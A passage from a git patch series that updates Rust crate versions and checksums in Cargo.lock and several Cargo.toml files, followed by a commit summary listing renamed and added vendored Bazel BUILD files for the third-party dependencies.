name = "syn" -version = "2.0.96" +version = "2.0.98" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d5d0adab1ae378d7f53bdebc67a39f1f151407ef230f0ce2883572f5d8985c80" +checksum = "36147f1a48ae0ec2b5b3bc5b537d267457555a10dc06f3dbc8cb11ba3006d3b1" dependencies = [ "proc-macro2", "quote", @@ -2277,9 +2288,9 @@ dependencies = [ [[package]] name = "toml" -version = "0.8.19" +version = "0.8.20" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a1ed1f98e3fdc28d6d910e6737ae6ab1a93bf1985935a1193e68f93eeb68d24e" +checksum = "cd87a5cdd6ffab733b2f74bc4fd7ee5fff6634124999ac278c35fc78c6120148" dependencies = [ "serde", "serde_spanned", 
@@ -2298,9 +2309,9 @@ dependencies = [ [[package]] name = "toml_edit" -version = "0.22.22" +version = "0.22.24" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4ae48d6208a266e853d946088ed816055e556cc6028c5e8e2b84d9fa5dd7c7f5" +checksum = "17b4795ff5edd201c7cd6dca065ae59972ce77d1b80fa0a84d94950ece7d1474" dependencies = [ "indexmap 2.7.0", "serde", @@ -2358,7 +2369,7 @@ version = "0.2.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "ee855f1f400bd0e5c02d150ae5de3840039a3f54b025156404e34c23c03f47c3" dependencies = [ - "log 0.4.22", + "log 0.4.25", "once_cell", "tracing-core", ] @@ -2473,9 +2484,9 @@ checksum = "a3e5df347f0bf3ec1d670aad6ca5c6a1859cd9ea61d2113125794654ccced68f" [[package]] name = "unicode-ident" -version = "1.0.14" +version = "1.0.16" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "adb9e6ca4f869e1180728b7950e35922a7fc6397f7b641499e8f3ef06e50dc83" +checksum = "a210d160f08b701c8721ba1c726c11662f877ea6b7094007e1ca9a1041945034" [[package]] name = "unicode-properties" @@ -2529,6 +2540,15 @@ version = "0.11.0+wasi-snapshot-preview1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "9c8d87e72b64a3b4db28d11ce29237c246188f4f51057d65a7eab63b7987e423" +[[package]] +name = "wasi" +version = "0.13.3+wasi-0.2.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "26816d2e1a4a36a2940b96c5296ce403917633dff8f3440e9b236ed6f6bacad2" +dependencies = [ + "wit-bindgen-rt", +] + [[package]] name = "wasm-bindgen" version = "0.2.99" @@ -2547,7 +2567,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "5f89bb38646b4f81674e8f5c3fb81b562be1fd936d84320f3264486418519c79" dependencies = [ "bumpalo", - "log 0.4.22", + "log 0.4.25", "proc-macro2", "quote", "syn", 
@@ -2773,13 +2793,22 @@ checksum = "589f6da84c646204747d1270a2a5661ea66ed1cced2631d546fdfb155959f9ec" [[package]] name = "winnow" -version = "0.6.24" +version = "0.7.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c8d71a593cc5c42ad7876e2c1fda56f314f3754c084128833e64f1345ff8a03a" +checksum = "0e7f4ea97f6f78012141bcdb6a216b2609f0979ada50b20ca5b52dde2eac2bb1" dependencies = [ "memchr", ] +[[package]] +name = "wit-bindgen-rt" +version = "0.33.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3268f3d866458b787f390cf61f4bbb563b922d091359f9608842999eaee3943c" +dependencies = [ + "bitflags 2.8.0", +] + [[package]] name = "yansi" version = "1.0.1" @@ -2793,7 +2822,16 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "1b9b4fd18abc82b8136838da5d50bae7bdea537c574d8dc1a34ed098d6c166f0" dependencies = [ "byteorder", - "zerocopy-derive", + "zerocopy-derive 0.7.35", +] + +[[package]] +name = "zerocopy" +version = "0.8.20" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dde3bb8c68a8f3f1ed4ac9221aad6b10cece3e60a8e2ea54a6a2dec806d0084c" +dependencies = [ + "zerocopy-derive 0.8.20", ] [[package]] @@ -2806,3 +2844,14 @@ dependencies = [ "quote", "syn", ] + +[[package]] +name = "zerocopy-derive" +version = "0.8.20" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "eea57037071898bf96a6da35fd626f4f27e9cee3ead2a6c703cf09d472b2e700" +dependencies = [ + "proc-macro2", + "quote", + "syn", +] diff --git a/rust/ast-generator/Cargo.toml b/rust/ast-generator/Cargo.toml index d239ed3de089..6e89b5d140cc 100644 --- a/rust/ast-generator/Cargo.toml +++ b/rust/ast-generator/Cargo.toml 
@@ -9,9 +9,9 @@ license = "MIT" ungrammar = "1.16.1" proc-macro2 = "1.0.93" quote = "1.0.38" -either = "1.13.0" -stdx = {package = "ra_ap_stdx", version = "0.0.258"} +either = "1.14.0" +stdx = {package = "ra_ap_stdx", version = "0.0.266"} itertools = "0.14.0" mustache = "0.9.0" -serde = { version = "1.0.217", features = ["derive"] } -anyhow = "1.0.95" +serde = { version = "1.0.218", features = ["derive"] } +anyhow = "1.0.96" diff --git a/rust/extractor/Cargo.toml b/rust/extractor/Cargo.toml index 3edcbc744db7..cc7c67407964 100644 --- a/rust/extractor/Cargo.toml +++ b/rust/extractor/Cargo.toml @@ -6,25 +6,25 @@ license = "MIT" # When updating these dependencies, run `rust/update_cargo_deps.sh` [dependencies] -anyhow = "1.0.95" -clap = { version = "4.5.26", features = ["derive"] } +anyhow = "1.0.96" +clap = { version = "4.5.31", features = ["derive"] } figment = { version = "0.10.19", features = ["env", "yaml"] } num-traits = "0.2.19" -ra_ap_base_db = "0.0.258" -ra_ap_hir = "0.0.258" -ra_ap_hir_def = "0.0.258" -ra_ap_ide_db = "0.0.258" -ra_ap_hir_expand = "0.0.258" -ra_ap_load-cargo = "0.0.258" -ra_ap_paths = "0.0.258" -ra_ap_project_model = "0.0.258" -ra_ap_syntax = "0.0.258" -ra_ap_vfs = "0.0.258" -ra_ap_parser = "0.0.258" -ra_ap_span = "0.0.258" -ra_ap_cfg = "0.0.258" -ra_ap_intern = "0.0.258" -serde = "1.0.217" +ra_ap_base_db = "0.0.266" +ra_ap_hir = "0.0.266" +ra_ap_hir_def = "0.0.266" +ra_ap_ide_db = "0.0.266" +ra_ap_hir_expand = "0.0.266" +ra_ap_load-cargo = "0.0.266" +ra_ap_paths = "0.0.266" +ra_ap_project_model = "0.0.266" +ra_ap_syntax = "0.0.266" +ra_ap_vfs = "0.0.266" +ra_ap_parser = "0.0.266" +ra_ap_span = "0.0.266" +ra_ap_cfg = "0.0.266" +ra_ap_intern = "0.0.266" +serde = "1.0.218" serde_with = "3.12.0" triomphe = "0.1.14" argfile = "0.2.1" 
@@ -33,9 +33,9 @@ rust-extractor-macros = { path = "macros" } itertools = "0.14.0" glob = "0.3.2" chrono = { version = "0.4.39", features = ["serde"] } -serde_json = "1.0.135" +serde_json = "1.0.139" dunce = "1.0.5" -toml = "0.8.19" +toml = "0.8.20" tracing = "0.1.41" tracing-flame = "0.2.0" tracing-subscriber = "0.3.19" diff --git a/rust/extractor/macros/Cargo.toml b/rust/extractor/macros/Cargo.toml index 1f1c44b7d15d..06c1a6c43088 100644 --- a/rust/extractor/macros/Cargo.toml +++ b/rust/extractor/macros/Cargo.toml @@ -10,4 +10,4 @@ proc-macro = true # When updating these dependencies, run `rust/update_cargo_deps.sh` [dependencies] quote = "1.0.38" -syn = { version = "2.0.96", features = ["full"] } +syn = { version = "2.0.98", features = ["full"] } diff --git a/shared/tree-sitter-extractor/Cargo.toml b/shared/tree-sitter-extractor/Cargo.toml index a24523e7afbc..4c5bcd199419 100644 --- a/shared/tree-sitter-extractor/Cargo.toml +++ b/shared/tree-sitter-extractor/Cargo.toml @@ -6,7 +6,7 @@ authors = ["GitHub"] # When updating these dependencies, run `misc/bazel/3rdparty/update_cargo_deps.sh` [dependencies] -flate2 = "1.0" +flate2 = "1.1" globset = "0.4" tree-sitter = ">= 0.23.0" tracing = "0.1" @@ -23,4 +23,4 @@ num_cpus = "1.16.0" [dev-dependencies] tree-sitter-ql = "0.23.1" tree-sitter-json = "0.24.8" -rand = "0.8.5" +rand = "0.9.0" From 17703ec908eff8bbe50092d40dbd28c32307ffe4 Mon Sep 17 00:00:00 2001 
From: Paolo Tranquilli Date: Tue, 25 Feb 2025 13:26:39 +0100 Subject: [PATCH 031/892] Bazel: update vendored rust dependencies --- MODULE.bazel | 102 +- misc/bazel/3rdparty/BUILD.bazel | 2 +- .../BUILD.aho-corasick-1.1.3.bazel | 2 +- .../BUILD.always-assert-0.2.0.bazel | 2 +- ...UILD.android_system_properties-0.1.5.bazel | 2 +- .../BUILD.anstream-0.6.18.bazel | 18 +- .../BUILD.anstyle-parse-0.2.6.bazel | 2 +- .../BUILD.anstyle-query-1.1.2.bazel | 6 +- ...bazel => BUILD.anstyle-wincon-3.0.7.bazel} | 13 +- ...1.0.95.bazel => BUILD.anyhow-1.0.96.bazel} | 6 +- .../BUILD.argfile-0.2.1.bazel | 4 +- .../BUILD.atomic-0.6.0.bazel | 2 +- .../tree_sitter_extractors_deps/BUILD.bazel | 256 +-- ...2.7.0.bazel => BUILD.bitflags-2.8.0.bazel} | 2 +- .../BUILD.borsh-1.5.3.bazel | 4 +- .../BUILD.bstr-1.11.3.bazel | 2 +- .../BUILD.camino-1.1.9.bazel | 4 +- .../BUILD.cargo-platform-0.1.9.bazel | 2 +- .../BUILD.cargo_metadata-0.18.1.bazel | 12 +- .../BUILD.cc-1.2.7.bazel | 2 +- ....bazel => BUILD.chalk-derive-0.99.0.bazel} | 10 +- ...98.0.bazel => BUILD.chalk-ir-0.99.0.bazel} | 6 +- ...zel => BUILD.chalk-recursive-0.99.0.bazel} | 12 +- ...0.bazel => BUILD.chalk-solve-0.99.0.bazel} | 18 +- .../BUILD.chrono-0.4.39.bazel | 70 +- ...p-4.5.26.bazel => BUILD.clap-4.5.31.bazel} | 6 +- ....bazel => BUILD.clap_builder-4.5.31.bazel} | 10 +- ...4.bazel => BUILD.clap_derive-4.5.28.bazel} | 10 +- .../BUILD.crc32fast-1.4.2.bazel | 2 +- .../BUILD.crossbeam-channel-0.5.14.bazel | 2 +- .../BUILD.crossbeam-deque-0.8.6.bazel | 4 +- .../BUILD.crossbeam-epoch-0.9.18.bazel | 2 +- .../BUILD.crossbeam-utils-0.8.21.bazel | 2 +- .../BUILD.darling-0.20.10.bazel | 4 +- .../BUILD.darling_core-0.20.10.bazel | 12 +- .../BUILD.darling_macro-0.20.10.bazel | 6 +- .../BUILD.dashmap-5.5.3.bazel | 10 +- ...1.13.0.bazel => BUILD.either-1.14.0.bazel} | 4 +- .../BUILD.ena-0.14.3.bazel | 2 +- .../BUILD.encoding-0.2.33.bazel | 10 +- ...encoding-index-japanese-1.20141219.5.bazel | 2 +- 
...D.encoding-index-korean-1.20141219.5.bazel | 2 +- ...oding-index-simpchinese-1.20141219.5.bazel | 2 +- ...coding-index-singlebyte-1.20141219.5.bazel | 2 +- ...oding-index-tradchinese-1.20141219.5.bazel | 2 +- .../BUILD.figment-0.10.19.bazel | 40 +- .../BUILD.filetime-0.2.25.bazel | 56 +- ...-1.0.35.bazel => BUILD.flate2-1.1.0.bazel} | 6 +- .../BUILD.fs-err-2.11.0.bazel | 4 +- .../BUILD.fsevent-sys-4.1.0.bazel | 2 +- .../BUILD.fst-0.4.7.bazel | 2 +- .../BUILD.getrandom-0.2.15.bazel | 166 -- .../BUILD.getrandom-0.3.1.bazel | 226 +++ .../BUILD.globset-0.4.15.bazel | 10 +- .../BUILD.home-0.5.11.bazel | 6 +- .../BUILD.iana-time-zone-0.1.61.bazel | 30 +- .../BUILD.iana-time-zone-haiku-0.1.2.bazel | 4 +- .../BUILD.indexmap-1.9.3.bazel | 6 +- .../BUILD.indexmap-2.7.0.bazel | 4 +- ...0.9.6.bazel => BUILD.inotify-0.11.0.bazel} | 8 +- .../BUILD.inotify-sys-0.1.5.bazel | 2 +- .../BUILD.itertools-0.12.1.bazel | 2 +- .../BUILD.itertools-0.14.0.bazel | 2 +- .../BUILD.js-sys-0.3.76.bazel | 4 +- .../BUILD.kqueue-1.0.8.bazel | 4 +- .../BUILD.kqueue-sys-1.0.4.bazel | 4 +- .../BUILD.libc-0.2.169.bazel | 2 +- .../BUILD.libredox-0.1.3.bazel | 6 +- .../BUILD.line-index-0.1.2.bazel | 4 +- .../BUILD.lock_api-0.4.12.bazel | 6 +- .../BUILD.log-0.3.9.bazel | 2 +- ...og-0.4.22.bazel => BUILD.log-0.4.25.bazel} | 2 +- .../BUILD.matchers-0.1.0.bazel | 2 +- .../BUILD.memoffset-0.9.1.bazel | 4 +- ....2.bazel => BUILD.miniz_oxide-0.8.5.bazel} | 4 +- ...mio-0.8.11.bazel => BUILD.mio-1.0.3.bazel} | 64 +- .../BUILD.miow-0.6.0.bazel | 2 +- .../BUILD.mustache-0.9.0.bazel | 4 +- .../BUILD.notify-6.1.1.bazel | 179 --- .../BUILD.notify-8.0.0.bazel | 190 +++ ...8.bazel => BUILD.notify-types-2.0.0.bazel} | 6 +- .../BUILD.nu-ansi-term-0.46.0.bazel | 8 +- .../BUILD.num-traits-0.2.19.bazel | 4 +- .../BUILD.num_cpus-1.16.0.bazel | 66 +- ...0.2.bazel => BUILD.once_cell-1.20.3.bazel} | 2 +- .../BUILD.os_str_bytes-7.0.0.bazel | 2 +- .../BUILD.parking_lot-0.12.3.bazel | 4 +- .../BUILD.parking_lot_core-0.9.10.bazel 
| 60 +- .../BUILD.pear-0.2.9.bazel | 6 +- .../BUILD.pear_codegen-0.2.9.bazel | 8 +- .../BUILD.perf-event-0.4.7.bazel | 4 +- .../BUILD.perf-event-open-sys-1.0.1.bazel | 2 +- .../BUILD.petgraph-0.6.5.bazel | 4 +- .../BUILD.ppv-lite86-0.2.20.bazel | 2 +- .../BUILD.proc-macro2-1.0.93.bazel | 4 +- ...BUILD.proc-macro2-diagnostics-0.10.1.bazel | 12 +- .../BUILD.quote-1.0.38.bazel | 2 +- ...zel => BUILD.ra-ap-rustc_abi-0.97.0.bazel} | 14 +- .../BUILD.ra-ap-rustc_hashes-0.97.0.bazel | 86 + ...l => BUILD.ra-ap-rustc_index-0.97.0.bazel} | 10 +- ...ILD.ra-ap-rustc_index_macros-0.97.0.bazel} | 10 +- ...l => BUILD.ra-ap-rustc_lexer-0.97.0.bazel} | 9 +- ...ILD.ra-ap-rustc_parse_format-0.97.0.bazel} | 12 +- ...ra-ap-rustc_pattern_analysis-0.97.0.bazel} | 16 +- ...azel => BUILD.ra_ap_base_db-0.0.266.bazel} | 40 +- ...58.bazel => BUILD.ra_ap_cfg-0.0.266.bazel} | 14 +- ...azel => BUILD.ra_ap_edition-0.0.266.bazel} | 2 +- ...58.bazel => BUILD.ra_ap_hir-0.0.266.bazel} | 57 +- ...azel => BUILD.ra_ap_hir_def-0.0.266.bazel} | 79 +- ...l => BUILD.ra_ap_hir_expand-0.0.266.bazel} | 62 +- ...bazel => BUILD.ra_ap_hir_ty-0.0.266.bazel} | 81 +- ...bazel => BUILD.ra_ap_ide_db-0.0.266.bazel} | 62 +- ...bazel => BUILD.ra_ap_intern-0.0.266.bazel} | 11 +- ...l => BUILD.ra_ap_load-cargo-0.0.266.bazel} | 50 +- ...58.bazel => BUILD.ra_ap_mbe-0.0.266.bazel} | 42 +- ...bazel => BUILD.ra_ap_parser-0.0.266.bazel} | 14 +- ....bazel => BUILD.ra_ap_paths-0.0.266.bazel} | 4 +- ... 
BUILD.ra_ap_proc_macro_api-0.0.266.bazel} | 34 +- ...azel => BUILD.ra_ap_profile-0.0.266.bazel} | 30 +- ...> BUILD.ra_ap_project_model-0.0.266.bazel} | 52 +- ....bazel => BUILD.ra_ap_salsa-0.0.266.bazel} | 22 +- ...=> BUILD.ra_ap_salsa-macros-0.0.266.bazel} | 10 +- ...8.bazel => BUILD.ra_ap_span-0.0.266.bazel} | 24 +- ...8.bazel => BUILD.ra_ap_stdx-0.0.266.bazel} | 24 +- ...bazel => BUILD.ra_ap_syntax-0.0.266.bazel} | 30 +- ...> BUILD.ra_ap_syntax-bridge-0.0.266.bazel} | 30 +- ...el => BUILD.ra_ap_toolchain-0.0.266.bazel} | 6 +- ...258.bazel => BUILD.ra_ap_tt-0.0.266.bazel} | 16 +- ...58.bazel => BUILD.ra_ap_vfs-0.0.266.bazel} | 22 +- ...l => BUILD.ra_ap_vfs-notify-0.0.266.bazel} | 26 +- .../BUILD.rand-0.8.5.bazel | 170 -- .../BUILD.rand-0.9.0.bazel | 97 ++ ....1.bazel => BUILD.rand_chacha-0.9.0.bazel} | 8 +- ....6.4.bazel => BUILD.rand_core-0.9.2.bazel} | 10 +- .../BUILD.rayon-1.10.0.bazel | 4 +- .../BUILD.rayon-core-1.12.1.bazel | 6 +- .../BUILD.redox_syscall-0.5.8.bazel | 2 +- .../BUILD.regex-1.11.1.bazel | 8 +- .../BUILD.regex-automata-0.1.10.bazel | 2 +- .../BUILD.regex-automata-0.4.9.bazel | 6 +- .../BUILD.rowan-0.15.15.bazel | 10 +- ...1.0.bazel => BUILD.rustc-hash-2.1.1.bazel} | 2 +- .../BUILD.rustc-stable-hash-0.1.1.bazel | 83 + ...ustc_apfloat-0.2.1+llvm-462a31f5a5ab.bazel | 6 +- ...yu-1.0.18.bazel => BUILD.ryu-1.0.19.bazel} | 2 +- .../BUILD.same-file-1.0.6.bazel | 6 +- .../BUILD.semver-1.0.24.bazel | 4 +- ....0.217.bazel => BUILD.serde-1.0.218.bazel} | 8 +- ...bazel => BUILD.serde_derive-1.0.218.bazel} | 8 +- ...5.bazel => BUILD.serde_json-1.0.139.bazel} | 14 +- .../BUILD.serde_spanned-0.6.8.bazel | 2 +- .../BUILD.serde_with-3.12.0.bazel | 6 +- .../BUILD.serde_with_macros-3.12.0.bazel | 8 +- .../BUILD.serde_yaml-0.9.34+deprecated.bazel | 10 +- .../BUILD.sharded-slab-0.1.7.bazel | 2 +- ...13.2.bazel => BUILD.smallvec-1.14.0.bazel} | 2 +- .../BUILD.sptr-0.3.2.bazel | 86 - ...yn-2.0.96.bazel => BUILD.syn-2.0.98.bazel} | 8 +- 
.../BUILD.synstructure-0.13.1.bazel | 6 +- .../BUILD.thiserror-1.0.69.bazel | 4 +- .../BUILD.thiserror-impl-1.0.69.bazel | 6 +- .../BUILD.thread_local-1.1.8.bazel | 4 +- .../BUILD.time-0.3.37.bazel | 8 +- .../BUILD.time-macros-0.2.19.bazel | 4 +- ...l-0.8.19.bazel => BUILD.toml-0.8.20.bazel} | 10 +- .../BUILD.toml_datetime-0.6.8.bazel | 2 +- ...22.bazel => BUILD.toml_edit-0.22.24.bazel} | 12 +- .../BUILD.tracing-0.1.41.bazel | 6 +- .../BUILD.tracing-attributes-0.1.28.bazel | 6 +- .../BUILD.tracing-core-0.1.33.bazel | 2 +- .../BUILD.tracing-flame-0.2.0.bazel | 6 +- .../BUILD.tracing-log-0.2.0.bazel | 6 +- .../BUILD.tracing-subscriber-0.3.19.bazel | 20 +- .../BUILD.tree-sitter-0.24.6.bazel | 12 +- ...tree-sitter-embedded-template-0.23.2.bazel | 6 +- .../BUILD.tree-sitter-json-0.24.8.bazel | 6 +- .../BUILD.tree-sitter-ql-0.23.1.bazel | 6 +- .../BUILD.tree-sitter-ruby-0.23.1.bazel | 6 +- .../BUILD.triomphe-0.1.14.bazel | 4 +- .../BUILD.uncased-0.9.10.bazel | 4 +- ...bazel => BUILD.unicode-ident-1.0.16.bazel} | 2 +- .../BUILD.valuable-0.1.0.bazel | 2 +- .../BUILD.walkdir-2.5.0.bazel | 8 +- .../BUILD.wasi-0.13.3+wasi-0.2.2.bazel | 86 + .../BUILD.wasm-bindgen-0.2.99.bazel | 8 +- .../BUILD.wasm-bindgen-backend-0.2.99.bazel | 12 +- .../BUILD.wasm-bindgen-macro-0.2.99.bazel | 4 +- ...LD.wasm-bindgen-macro-support-0.2.99.bazel | 10 +- .../BUILD.wasm-bindgen-shared-0.2.99.bazel | 2 +- .../BUILD.winapi-0.3.9.bazel | 2 +- ...ILD.winapi-i686-pc-windows-gnu-0.4.0.bazel | 2 +- .../BUILD.winapi-util-0.1.9.bazel | 6 +- ...D.winapi-x86_64-pc-windows-gnu-0.4.0.bazel | 2 +- .../BUILD.windows-core-0.52.0.bazel | 2 +- .../BUILD.windows-sys-0.48.0.bazel | 3 +- .../BUILD.windows-sys-0.52.0.bazel | 10 +- .../BUILD.windows-sys-0.59.0.bazel | 7 +- .../BUILD.windows-targets-0.48.5.bazel | 12 +- .../BUILD.windows-targets-0.52.6.bazel | 12 +- ...BUILD.windows_aarch64_gnullvm-0.48.5.bazel | 2 +- ...BUILD.windows_aarch64_gnullvm-0.52.6.bazel | 2 +- .../BUILD.windows_aarch64_msvc-0.48.5.bazel | 2 +- 
.../BUILD.windows_aarch64_msvc-0.52.6.bazel | 2 +- .../BUILD.windows_i686_gnu-0.48.5.bazel | 2 +- .../BUILD.windows_i686_gnu-0.52.6.bazel | 2 +- .../BUILD.windows_i686_gnullvm-0.52.6.bazel | 2 +- .../BUILD.windows_i686_msvc-0.48.5.bazel | 2 +- .../BUILD.windows_i686_msvc-0.52.6.bazel | 2 +- .../BUILD.windows_x86_64_gnu-0.48.5.bazel | 2 +- .../BUILD.windows_x86_64_gnu-0.52.6.bazel | 2 +- .../BUILD.windows_x86_64_gnullvm-0.48.5.bazel | 2 +- .../BUILD.windows_x86_64_gnullvm-0.52.6.bazel | 2 +- .../BUILD.windows_x86_64_msvc-0.48.5.bazel | 2 +- .../BUILD.windows_x86_64_msvc-0.52.6.bazel | 2 +- ...-0.6.24.bazel => BUILD.winnow-0.7.3.bazel} | 2 +- .../BUILD.wit-bindgen-rt-0.33.0.bazel | 142 ++ .../BUILD.zerocopy-0.7.35.bazel | 4 +- .../BUILD.zerocopy-0.8.20.bazel | 148 ++ .../BUILD.zerocopy-derive-0.7.35.bazel | 6 +- .../BUILD.zerocopy-derive-0.8.20.bazel | 88 ++ .../tree_sitter_extractors_deps/crates.bzl | 4 +- .../tree_sitter_extractors_deps/defs.bzl | 1403 +++++++++-------- 222 files changed, 3129 insertions(+), 2529 deletions(-) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.anstyle-wincon-3.0.6.bazel => BUILD.anstyle-wincon-3.0.7.bazel} (88%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.anyhow-1.0.95.bazel => BUILD.anyhow-1.0.96.bazel} (97%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.bitflags-2.7.0.bazel => BUILD.bitflags-2.8.0.bazel} (99%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.chalk-derive-0.98.0.bazel => BUILD.chalk-derive-0.99.0.bazel} (94%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.chalk-ir-0.98.0.bazel => BUILD.chalk-ir-0.99.0.bazel} (96%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.chalk-recursive-0.98.0.bazel => BUILD.chalk-recursive-0.99.0.bazel} (92%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.chalk-solve-0.98.0.bazel => BUILD.chalk-solve-0.99.0.bazel} (89%) rename 
misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.clap-4.5.26.bazel => BUILD.clap-4.5.31.bazel} (96%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.clap_builder-4.5.26.bazel => BUILD.clap_builder-4.5.31.bazel} (94%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.clap_derive-4.5.24.bazel => BUILD.clap_derive-4.5.28.bazel} (94%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.either-1.13.0.bazel => BUILD.either-1.14.0.bazel} (98%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.flate2-1.0.35.bazel => BUILD.flate2-1.1.0.bazel} (96%) delete mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.getrandom-0.2.15.bazel create mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.getrandom-0.3.1.bazel rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.inotify-0.9.6.bazel => BUILD.inotify-0.11.0.bazel} (95%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.log-0.4.22.bazel => BUILD.log-0.4.25.bazel} (99%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.miniz_oxide-0.8.2.bazel => BUILD.miniz_oxide-0.8.5.bazel} (98%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.mio-0.8.11.bazel => BUILD.mio-1.0.3.bazel} (74%) delete mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-6.1.1.bazel create mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-8.0.0.bazel rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_limit-0.0.258.bazel => BUILD.notify-types-2.0.0.bazel} (97%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.once_cell-1.20.2.bazel => BUILD.once_cell-1.20.3.bazel} (99%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra-ap-rustc_abi-0.87.0.bazel => BUILD.ra-ap-rustc_abi-0.97.0.bazel} (88%) create mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra-ap-rustc_hashes-0.97.0.bazel rename 
misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra-ap-rustc_index-0.87.0.bazel => BUILD.ra-ap-rustc_index-0.97.0.bazel} (92%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra-ap-rustc_index_macros-0.87.0.bazel => BUILD.ra-ap-rustc_index_macros-0.97.0.bazel} (95%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra-ap-rustc_lexer-0.87.0.bazel => BUILD.ra-ap-rustc_lexer-0.97.0.bazel} (94%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra-ap-rustc_parse_format-0.87.0.bazel => BUILD.ra-ap-rustc_parse_format-0.97.0.bazel} (91%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra-ap-rustc_pattern_analysis-0.87.0.bazel => BUILD.ra-ap-rustc_pattern_analysis-0.97.0.bazel} (89%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_base_db-0.0.258.bazel => BUILD.ra_ap_base_db-0.0.266.bazel} (76%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_cfg-0.0.258.bazel => BUILD.ra_ap_cfg-0.0.266.bazel} (90%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_edition-0.0.258.bazel => BUILD.ra_ap_edition-0.0.266.bazel} (99%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_hir-0.0.258.bazel => BUILD.ra_ap_hir-0.0.266.bazel} (68%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_hir_def-0.0.258.bazel => BUILD.ra_ap_hir_def-0.0.266.bazel} (61%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_hir_expand-0.0.258.bazel => BUILD.ra_ap_hir_expand-0.0.266.bazel} (67%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_hir_ty-0.0.258.bazel => BUILD.ra_ap_hir_ty-0.0.266.bazel} (60%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_ide_db-0.0.258.bazel => BUILD.ra_ap_ide_db-0.0.266.bazel} (68%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_intern-0.0.258.bazel => BUILD.ra_ap_intern-0.0.266.bazel} (93%) rename 
misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_load-cargo-0.0.258.bazel => BUILD.ra_ap_load-cargo-0.0.266.bazel} (69%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_mbe-0.0.258.bazel => BUILD.ra_ap_mbe-0.0.266.bazel} (74%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_parser-0.0.258.bazel => BUILD.ra_ap_parser-0.0.266.bazel} (89%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_paths-0.0.258.bazel => BUILD.ra_ap_paths-0.0.266.bazel} (98%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_proc_macro_api-0.0.258.bazel => BUILD.ra_ap_proc_macro_api-0.0.266.bazel} (79%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_profile-0.0.258.bazel => BUILD.ra_ap_profile-0.0.266.bazel} (80%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_project_model-0.0.258.bazel => BUILD.ra_ap_project_model-0.0.266.bazel} (71%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_salsa-0.0.258.bazel => BUILD.ra_ap_salsa-0.0.266.bazel} (86%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_salsa-macros-0.0.258.bazel => BUILD.ra_ap_salsa-macros-0.0.266.bazel} (94%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_span-0.0.258.bazel => BUILD.ra_ap_span-0.0.266.bazel} (85%) rename 